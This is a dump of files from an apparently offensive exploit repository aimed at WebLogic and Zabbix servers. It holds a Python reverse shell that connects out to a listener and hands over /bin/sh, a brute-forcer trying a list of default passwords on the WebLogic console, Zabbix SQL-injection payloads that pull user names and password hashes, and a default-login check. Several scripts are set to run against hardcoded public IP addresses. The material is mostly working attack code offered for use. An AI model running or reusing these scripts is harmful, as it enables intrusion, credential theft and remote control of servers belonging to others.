https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_upload_inst.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Linux_upload_reverse.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_upload_reverse.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Linux_upload_uninst.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Linux_upload_uninst.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Windows_delete.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_delete.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Windows_inst.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_inst.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Windows_reverse.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_reverse.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Windows_uninst.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_uninst.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Windows_upload_inst.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_upload_inst.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Windows_upload_reverse.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_upload_reverse.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/payload_Windows_upload_uninst.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/payload_Windows_upload_uninst.bin
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/reverse.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/reverse.jar
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/reverse_shell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import socket,subprocess,os;
3 |
4 | LHOST = '192.168.56.1'
5 | LPORT = 8080
6 |
7 | def main():
8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
9 | s.connect((LHOST,LPORT));
10 | os.dup2(s.fileno(),0);
11 | os.dup2(s.fileno(),1);
12 | os.dup2(s.fileno(),2);
13 | p=subprocess.call(["/bin/sh","-i"]);
14 |
15 | if __name__ == '__main__':
16 | main()
17 |
--------------------------------------------------------------------------------
/middileware/weblogic/payload_bin/uninst.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/payload_bin/uninst.jar
--------------------------------------------------------------------------------
/middileware/weblogic/shellApp.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/shellApp.jar
--------------------------------------------------------------------------------
/middileware/weblogic/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/middileware/weblogic/weblogic.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/middileware/weblogic/weblogic.jar
--------------------------------------------------------------------------------
/middileware/weblogic/weblogic_crackpass.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 | import urllib2
4 |
5 |
6 | from t import T
7 |
8 |
9 |
10 |
11 | class P(T):
12 | def __init__(self):
13 | T.__init__(self)
14 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
15 | timeout=5
16 | target_url = 'http://'+ip+':'+port
17 | result = {}
18 | result['result']=False
19 |
20 | res=None
21 | error_i=0
22 | flag_list=['<title>WebLogic Server Console','javascript/console-help.js','WebLogic Server Administration Console Home','/console/console.portal','console/jsp/common/warnuserlockheld.jsp','/console/actions/common/']
23 | user_list=['weblogic']
24 | pass_list=['weblogic','password','Weblogic1','weblogic10','weblogic10g','weblogic11','weblogic11g','weblogic12','weblogic12g','weblogic13','weblogic13g','weblogic123','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root']
25 | try:
26 | res = urllib2.urlopen(target_url+"/console/login/LoginForm.jsp")
27 | cookies = res.headers['Set-Cookie']
28 | except Exception,e:
29 | return result
30 | finally:
31 | if res is not None:
32 | res.close()
33 | del res
34 | for user in user_list:
35 | for password in pass_list:
36 | try:
37 | PostStr='j_username=%s&j_password=%s&j_character_encoding=UTF-8'%(user,password)
38 | request = urllib2.Request(target_url+'/console/j_security_check',PostStr)
39 | request.add_header("Cookie",cookies)
40 | res = urllib2.urlopen(request,timeout=timeout)
41 | res_html = res.read()
42 | except urllib2.HTTPError,e:
43 | return result
44 | except urllib2.URLError,e:
45 | error_i+=1
46 | if error_i >= 3:
47 | return result
48 | continue
49 | finally:
50 | if res is not None:
51 | res.close()
52 | del res
53 | for flag in flag_list:
54 | if flag in res_html:
55 | info = '%s/console Weblogic Weak password %s:%s'%(target_url,user,password)
56 | result['result']=True
57 | result['VerifyInfo'] = {}
58 | result['VerifyInfo']['type']='console Weblogic Weak password'
59 | result['VerifyInfo']['URL'] =target_url
60 | result['VerifyInfo']['payload']=target_url+"/console/login/LoginForm.jsp"
61 | result['VerifyInfo']['result'] =info
62 | return result
63 | return result
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 | if __name__ == '__main__':
72 | print P().verify(ip='125.69.90.234',port='7001')
--------------------------------------------------------------------------------
/middileware/zabbix/__init__.py:
--------------------------------------------------------------------------------
1 | KEYWORDS = ['zabbix', ]
2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
3 | if 'zabbix' in hackinfo or 'zabbix' in context:
4 | return True
5 | else:
6 |
7 | return False
--------------------------------------------------------------------------------
/middileware/zabbix/t.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding: utf-8
3 |
4 |
5 | class T(object):
6 | def __init__(self):
7 |
8 | self.result = {
9 | 'type': None,
10 | 'version': None,
11 | }
12 | self.keywords = []
13 | self.versions = []
14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw):
15 | ##
16 | #head 返回的请求头
17 | #context 返回请求正文html代码
18 | #ip 请求ip
19 | #port 请求端口
20 | #productname 请求的组件产品
21 | #keywords 暂时已知的关键词组件
22 | #hackinfo 备用字段
23 |
24 |
25 |
26 |
27 | return True
28 |
29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
30 | result = {}
31 | result['result']=False
32 | return result
33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
34 | result = {}
35 | result['result']=False
36 | return result
37 | def parse_output(self, result):
38 | result = {}
39 | result['result']=False
40 | return result
--------------------------------------------------------------------------------
/middileware/zabbix/zabbix_sqlhack.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | import urllib2
3 |
4 |
5 | from t import T
6 |
7 |
8 |
9 |
10 | class P(T):
11 | def __init__(self):
12 | T.__init__(self)
13 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
14 | timeout=3
15 | target_url = 'http://'+ip+':'+port
16 | result = {}
17 | res=None
18 |
19 | result['result']=False
20 | res_html=None
21 | vul_url = target_url + "/httpmon.php?applications=2%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(alias,0x7e,passwd,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)"
22 | try:
23 | res=urllib2.urlopen(vul_url,timeout=timeout)
24 | res_html = res.read()
25 | except:
26 | res_html=''
27 | finally:
28 | if res is not None:
29 | res.close()
30 |
31 | if "from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables" in res_html:
32 | info = vul_url + " zabbix"
33 | result['result']=True
34 | result['VerifyInfo'] = {}
35 | result['VerifyInfo']['type']='zabbix SQL Vul'
36 | result['VerifyInfo']['URL'] =target_url
37 | result['VerifyInfo']['payload']=vul_url
38 | result['VerifyInfo']['result'] =info
39 | return result
40 | else:
41 | vul_url = target_url + "/zabbix/httpmon.php?applications=2%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(alias,0x7e,passwd,0x7e)%20as%20char),0x7e))%20from%20zabbix.users%20LIMIT%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)"
42 | try:
43 | print vul_url
44 | res=urllib2.urlopen(vul_url,timeout=timeout)
45 | res_html = res.read()
46 |
47 | except:
48 | return result
49 | finally:
50 | if res is not None:
51 | res.close()
52 | del res
53 |
54 | if 'from zabbix.users LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables' in res_html:
55 | info = vul_url + " zabbix"
56 | result['result']=True
57 | result['VerifyInfo'] = {}
58 | result['VerifyInfo']['type']='zabbix SQL Vul'
59 | result['VerifyInfo']['URL'] =target_url
60 | result['VerifyInfo']['payload']=vul_url
61 | result['VerifyInfo']['result'] =res_html
62 | return result
63 | return result
64 |
65 |
66 |
67 |
68 |
69 | if __name__ == '__main__':
70 | print P().verify(ip='124.202.152.197',port='80')
--------------------------------------------------------------------------------
/middileware/zabbix/zabbix_sqli_v2-3.03.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | import urllib2
3 |
4 |
5 | from t import T
6 |
7 |
8 |
9 |
10 | class P(T):
11 | def __init__(self):
12 | T.__init__(self)
13 | self.version='2.2.x,3.0.0-3.0.3'
14 |
15 | self.type = 'sqli'
16 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
17 | timeout=3
18 | target_url = 'http://'+ip+':'+port
19 | result = {}
20 | res=None
21 | payload="/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
22 | result['result']=False
23 | res_html=None
24 | vul_url = target_url + payload
25 | try:
26 | res=urllib2.urlopen(vul_url,timeout=timeout)
27 | res_html = res.read()
28 | except:
29 | res_html=''
30 | finally:
31 | if res is not None:
32 | res.close()
33 |
34 | if "ed733b8d10be225eceba344d533586" in res_html:
35 | info = vul_url + " zabbix "+self.version
36 | result['result']=True
37 | result['VerifyInfo'] = {}
38 | result['VerifyInfo']['type']='zabbix SQL Vul'
39 | result['VerifyInfo']['URL'] =target_url
40 | result['VerifyInfo']['payload']=vul_url
41 | result['VerifyInfo']['result'] =info
42 | result['VerifyInfo']['level'] = 'hole'
43 | return result
44 | else:
45 | vul_url = target_url + payload
46 | try:
47 | print vul_url
48 | res=urllib2.urlopen(vul_url,timeout=timeout)
49 | res_html = res.read()
50 |
51 | except:
52 | return result
53 | finally:
54 | if res is not None:
55 | res.close()
56 | del res
57 |
58 | if 'ed733b8d10be225eceba344d533586' in res_html:
59 | info = vul_url + " zabbix "+self.version
60 | result['result']=True
61 | result['VerifyInfo'] = {}
62 | result['VerifyInfo']['type']='zabbix SQL Vul'
63 | result['VerifyInfo']['URL'] =target_url
64 | result['VerifyInfo']['payload']=vul_url
65 | result['VerifyInfo']['result'] =res_html
66 | result['VerifyInfo']['level'] = 'hole'
67 | return result
68 | return result
69 |
70 |
71 |
72 |
73 |
74 | if __name__ == '__main__':
75 | print P().verify(ip='103.17.42.170',port='80')
--------------------------------------------------------------------------------
/middileware/zabbix/zabbix_weakpass.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 | import requests
4 | from bs4 import BeautifulSoup
5 | import base64,re
6 | from t import T
7 | def _get_static_post_attr(page_content):
8 | """
9 | 拿到的post参数,并return
10 | """
11 | _dict = {}
12 | soup = BeautifulSoup(page_content, "html.parser")
13 | for each in soup.find_all('input'):
14 | if 'value' in each.attrs and 'name' in each.attrs:
15 | _dict[each['name']] = each['value']
16 | return _dict
17 | class P(T):
18 | def __init__(self):
19 | T.__init__(self)
20 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
21 | timeout=10
22 | target_url = 'http://'+ip+':'+port
23 | result = {}
24 | result['result']=False
25 | r=None
26 | s = None
27 | h1 = {
28 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
29 | }
30 |
31 | h2 = {
32 | 'Referer': target_url.strip('\n'),
33 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
34 | }
35 |
36 | blacklist = [
37 | 'incorrect',
38 | '',
39 |
40 | ]
41 | try:
42 | s = requests.session()
43 | c = s.get(target_url, timeout=10, headers=h1)
44 | dic = _get_static_post_attr(c.content)
45 | dic['name'] = 'Admin'
46 | dic['password'] = 'zabbix'
47 | # print dic
48 | r = s.post(target_url + '/index.php', data=dic, headers=h2, timeout=10)
49 | print r.content
50 | if 'chkbxRange.init();' in r.content:
51 | for each in blacklist:
52 | if each in r.content:
53 | return result
54 | else:
55 | info = ' zabbix Weak password Admin:zabbix'
56 |
57 | result['result'] = True
58 | result['VerifyInfo'] = {}
59 | result['VerifyInfo']['type'] = 'Tomcat Weak password'
60 | result['VerifyInfo']['URL'] = target_url
61 | result['VerifyInfo']['result'] = info
62 | except Exception, e:
63 | print e
64 | finally:
65 | if r is not None:
66 | r.close()
67 | if s is not None:
68 | s.close()
69 | return result
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 | if __name__ == '__main__':
82 | print P().verify(ip='180.235.64.209',port='8080')
--------------------------------------------------------------------------------